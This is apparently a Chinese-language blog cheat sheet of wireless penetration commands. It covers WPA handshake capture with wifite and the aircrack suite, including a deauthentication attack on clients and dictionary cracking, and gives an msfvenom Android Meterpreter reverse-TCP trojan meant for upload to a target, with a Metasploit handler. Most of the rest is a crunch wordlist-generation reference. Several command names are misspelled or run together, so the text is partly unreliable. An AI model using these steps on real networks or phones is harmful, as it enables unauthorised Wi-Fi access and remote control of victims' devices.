无线网络渗透命令

一、虚拟机-可移动设备-Ralink(网上)-连接

二、lsusb查看确认,iwconfig,查看外围网卡(可能会显示wlan0)

一、自动化工具wiftte

1)启动wifite

2)出现热点列表

3ctrl+ c 停止,选择指定的热点序号

4)以下就是自动化抓握手包(会在当前目录下/hs/下产生一个.cap包)

5/usr/share/wordlists/目录下有一个字典文件,rockyou.txt.gz,在kali里面以图形化界面(computer,解压出来(右键)。(班组时,提示使用该密码,个人时,不一定)。

6airdump   -w 1.txt  /root/hs/x.cap(注意路径)

字典文件另外可以通过工具直接生成,或者使用kali中自带的crunch

https://www.cnblogs.com/student-programmer/p/6729101.html

二、手工破解

1.airmon-ng start wlan0(启动为monitor模式)

      再用iwconfig查看,wlan0会变成wlan0mon

2.airodump-ng  wlan0mon

开始搜索所有热点

3.发现指定APSSID

4.另开一个窗口,用airodump-ng  -c 1(指定AP所在信道CH- - bssid  wlan0mon

5.再另开一个窗口,用aireply-ng  -0  5 -a  00:14….  –c 11:22…..  wlan0mon

-0:是数字0,不是字母o-a:是APSSID-c:是客户机的MAC

6.发现5中的窗口右上角,出现shakehand (抓到握手包)

7. airdump  -w 1.txt  /root/hs/x.cap(注意路径)

8.暴出密码。

9.本机连接wifi

三、手机木马生成

一、msfvenom -p android/meterpreter/reverse_tcplhost=172.16.0.1 lport=4444 > 111.apk

上传到目标机。

二、

Msfconsole

set payloadandroid/meterpreter/reverse_http

useexploit/multi/handler

三、使用手机模拟工具

运用木马

Crunch用法:

https://blog.csdn.net/u011781521/article/details/69400198

-b             #体积大小,比如后跟20mib
-c             #
密码个数(行数),比如8000
-d             #
限制出现相同元素的个数(至少出现元素个数),-d 3就不会出现zzf ffffgggg之类的
-e             #
定义停止生成密码,比如-e 222222:到222222停止生成密码
-f              #
调用密码库文件,比如/usr/share/crunch/charset.lst
-i               #
改变输出格式
-l               #
-t搭配使用
-m             #
-p搭配使用
-o              #
保存为
-p               #定义密码元素(若指定,必须放在最后)
-q               #
读取字典
-r               #
定义从某一个地方重新开始
-s               #
第一个密码,从xxx开始
-t                #定义输出格式
                 @代表小写字母
                 ,
代表大写字母    
                 %
代表数字
                 ^
代表符号

案例1
crunch 1 8
#
生成最小1位,最大8位,由26个小写字母为元素的所有组合
 
案例2
crunch 1 6 abcdefg
#
生成最小为1,最大为6.abcdefg为元素的所有组合
 
案例3
crunch 1 6 abcdefg\
#
生成最小为1,最大为6.abcdefg和空格为元素的所有组合(/代表空格)
 
案例4
crunch 1 8 -f charset.lst mixalpha-numeric-all-space -o wordlist.txt


#
调用密码库charset.lst生成最小为1,最大为8,元素为密码库charset.lstmixalpha-numeric-all-space的项目,并保存为wordlist.txt;其中charset.lstkali_linux的目录为/usr/share/crunch/charset.lstcharset.lstmixalpha-numeric-all-space项目包含最常见的元素组合(即大小写字母+数字+常见符号);
>想了解更多可以cat/usr/share/crunch/charset.lst 查看所有密码库

(如果要使用字符集的话,要指定路径)
 
案例5
crunch 8 8 -f charset.lst mixalpha-numeric-all-space -o wordlist.txt -t @@dog@@@ -s cbdogaaa
#
调用密码库charset.lst,生成8位密码;其中元素为密码库charset.lstmixalpha-numeric-all-space的项;格式为两个小写字母+dog+三个小写字母,并以cbdogaaa开始枚举(@代表小写字母)
 
案例6
crunch 2 3 -f charset.lst ualpha -s BB
#
调用密码库charset.lst,生成2位和3位密码;其中元素为密码库charset.lstualpha的项;并且以BB开头
 
案例7
crunch 4 5 -p abc
#crunch
将会生成abc,acb, bac, bca, cab, cba,虽然数字45这里没用,但必须有
 
案例8
crunch 4 5 -p dog cat bird
#crunch
将生成以“dog”“cat”“bird”为元素的所有密码组合:birdcatdogbirddogcatcatbirddog,  catdogbird,  dogbirdcat, dogcatbird
  
案例10
crunch 4 5 -b 20mib -o START
#
生成最小为4位,最大为5位元素为所有小写字母的密码字典,并以20M进行分割;这时会生成4个文件:aaaa-gvfed.txt, gvfee-ombqy.txt,  ombqz-wcydt.txt, wcydu-zzzzz.txt:其中前三个大概每个20M,最后一个10M左右(因为总共70M
 
案例11
crunch 4 4  + + 123 +-t %%@^+是占位符,有顺序,分别为小写字母、大写字母、数字、特殊符号,123所在的位置是数字,但是限定为123,其它类似。)(输出的话,-o 1.txt
#
生成4位密码,其中格式为两个数字”+“一个小写字母”+“常见符号(其中数字这里被指定只能为123组成的所有2位数字组合)。比如12f#     32j^    13t$    ......
 
案例12
crunch 3 3 abc + 123 @#! -t @%^
#
生成3位密码,其中第一位由“abc”中的一个;第二位为“1,2,3”中的一个;第三位为!,@#”中的一个。比如1a  2a#      3b@   ......
 
案例13
crunch 3 3 abc + 123 @#! -t ^%@
#
生成3位密码,其中格式为字符+数字+字母,这里字符范围为!@# ,数字范围为 1 2 3, 字母范围为a b c
比如!1c   @3b       @2a       ......
 
案例14
crunch 5 5 -t ddd@@  -p dog cat bird
#
生成5个元素组成的密码,其中前三个为dog cat bird任意组合,后两个为两个小写字母的任意组合。比如birddogcatuz        catdogbirdab        birdcatdogff           ......
 
案例15
crunch 7 7 -t p@ss,%^ -l a@aaaaa
#
生成7位密码,格式为字符p@ss”+大写字母+数字+符号    比如 p@ssZ9>  ......
 
案例16
crunch 5 5 -s @4#S2 -t @%^,% -e @8 Q2 -l @dddd -b 10KB -o START
#
生成5位密码,格式为小写字母+数字+符号+大写字母+数字,并以 @4#S2开始,分割为10k大小。。。
 
案例17
crunch 5 5 -d 2@ -t @@@%%
#
生成5位密码,格式为三个字母+两个数字,并限制每个密码最少出现2种字母
 
案例18
crunch 10 10 -t @@@^%%%%^^ -d 2@ -d 3% -b 20mb -o START
#
生成10位密码,格式为三个小写字母+一个符号+四个数字+两个符号,限制每个密码至少2种字母和至少3种数字
 
案例19
crunch 8 8 -d 2@
#
生成8位密码,每个密码至少出现两种字母
 
案例20
crunch 4 4 -f unicode_test.lst the-greeks -t @@%% -l @xdd
#
调用密码库unicode_test.lst中的the-greeks项目字符,生成4位密码,其中格式为两小写字母+两数字,同样kali_linuxunicode_test.lst /usr/share/crunch目录

 

案例9
crunch 1 5 -o START -c 6000 -z bzip2
#
生成最小为1位,最大为5位元素为所有小写字母的密码字典,其中每一个字典文件包含6000个密码,并将密码文件保存为bz2文件,文件名将以 "第一个密码"+ " - " + "最后一个密码"+ " .txt.bz2 " 保存(比如000-999.txt.bz2);下面是生成几种格式的压缩文件所用的时间和体积大小对比:
       # time ./crunch 1 4 -o START -c 6000 -z gzip
       real    0m2.729s
       user    0m2.216s
       sys     0m0.360s
       # time ./crunch 1 4 -o START -c 6000 -z bzip2
       real    0m3.414s
       user    0m2.620s
       sys     0m0.580s
       # time ./crunch 1 4 -o START -c 6000 -z lzma
       real    0m43.060s
       user    0m9.965s
       sys     0m32.634s
       size  filename
       30K   aaaa-aiwt.txt
       12K   aaaa-aiwt.txt.gz
       3.8K  aaaa-aiwt.txt.bz2
       1.1K  aaaa-aiwt.txt.lzma



 

 

 


你可能感兴趣的:(无线网络渗透命令)